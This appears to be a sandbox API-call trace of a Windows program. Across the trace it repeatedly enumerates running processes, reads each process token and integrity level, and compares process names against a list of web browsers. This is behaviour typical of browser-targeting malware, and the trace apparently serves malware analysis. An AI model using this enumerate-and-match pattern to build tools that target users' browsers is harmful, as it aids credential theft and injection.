GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0478.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0478.379] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376420, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">r") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0478.379] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0478.379] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0478.379] GetLastError () returned 0x7a [0478.379] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0478.379] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0478.379] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0478.379] CloseHandle (hObject=0x3bc) returned 1 [0478.379] CloseHandle (hObject=0x5a4) returned 1 [0478.379] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0478.379] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0478.379] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0478.379] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0478.379] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0478.379] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0478.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0478.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0478.379] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0478.379] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0478.379] GetLastError () returned 0x7a [0478.379] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0478.379] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0478.379] CloseHandle (hObject=0x3bc) returned 1 [0478.379] CloseHandle (hObject=0x5a4) returned 1 [0478.379] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0478.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0478.379] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376a68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">s") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0478.379] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0478.379] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0478.379] GetLastError () returned 0x7a [0478.379] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0478.379] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0478.379] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0478.379] CloseHandle (hObject=0x3bc) returned 1 [0478.379] CloseHandle (hObject=0x5a4) returned 1 [0478.379] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0478.379] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0478.380] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0478.380] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0478.380] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0478.380] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0478.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0478.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0478.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0478.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0478.380] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0478.380] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0478.380] GetLastError () returned 0x7a [0478.380] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0478.380] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0478.380] CloseHandle (hObject=0x3bc) returned 1 [0478.380] CloseHandle (hObject=0x5a4) returned 1 [0478.380] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0478.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0478.380] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376e10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">t") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0478.380] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0478.380] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0478.380] GetLastError () returned 0x7a [0478.380] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0478.380] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0478.380] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0478.380] CloseHandle (hObject=0x3bc) returned 1 [0478.380] CloseHandle (hObject=0x5a4) returned 1 [0478.380] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0478.380] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0478.380] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0478.380] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0478.380] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0478.380] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0478.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0478.380] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0478.381] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0480.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa6a8) returned 0xc0000004 [0480.401] VirtualAlloc (lpAddress=0x0, dwSize=0xb6a8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0480.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb6a8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0480.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0480.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0480.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0480.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0480.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0480.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0480.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0480.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0480.406] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0480.406] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0480.407] GetLastError () returned 0x7a [0480.407] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0480.407] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0480.408] CloseHandle (hObject=0x3bc) returned 1 [0480.408] CloseHandle (hObject=0x5a4) returned 1 [0480.413] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0480.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0480.414] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x378028, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">u") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0480.414] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0480.414] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0480.415] GetLastError () returned 0x7a [0480.415] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0480.415] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0480.416] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0480.416] CloseHandle (hObject=0x3bc) returned 1 [0480.416] CloseHandle (hObject=0x5a4) returned 1 [0480.416] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0480.417] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0480.417] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0480.417] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0480.418] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0480.418] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0480.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0480.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0480.422] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0480.422] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0480.423] GetLastError () returned 0x7a [0480.423] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0480.423] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0480.424] CloseHandle (hObject=0x3bc) returned 1 [0480.424] CloseHandle (hObject=0x5a4) returned 1 [0480.425] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0480.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0480.425] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375c60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">v") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0480.425] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0480.426] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0480.426] GetLastError () returned 0x7a [0480.426] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0480.431] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0480.431] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0480.431] CloseHandle (hObject=0x3bc) returned 1 [0480.432] CloseHandle (hObject=0x5a4) returned 1 [0480.432] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0480.432] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0480.432] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0480.433] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0480.433] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0480.433] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0480.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0480.433] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0480.434] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0480.434] GetLastError () returned 0x7a [0480.434] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0480.434] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0480.435] CloseHandle (hObject=0x3bc) returned 1 [0480.435] CloseHandle (hObject=0x5a4) returned 1 [0480.435] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0480.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0480.440] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376420, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">w") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0480.441] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0480.441] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0480.441] GetLastError () returned 0x7a [0480.441] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0480.442] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0480.442] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0480.442] CloseHandle (hObject=0x3bc) returned 1 [0480.442] CloseHandle (hObject=0x5a4) returned 1 [0480.443] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0480.443] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0480.443] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0480.444] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0480.444] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0480.444] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0480.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0480.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0480.445] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0480.445] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0480.445] GetLastError () returned 0x7a [0480.445] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0480.447] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0480.447] CloseHandle (hObject=0x3bc) returned 1 [0480.447] CloseHandle (hObject=0x5a4) returned 1 [0480.447] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0480.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0480.448] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376a68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">x") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0480.448] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0480.449] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0480.449] GetLastError () returned 0x7a [0480.449] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0480.450] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0480.450] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0480.450] CloseHandle (hObject=0x3bc) returned 1 [0480.450] 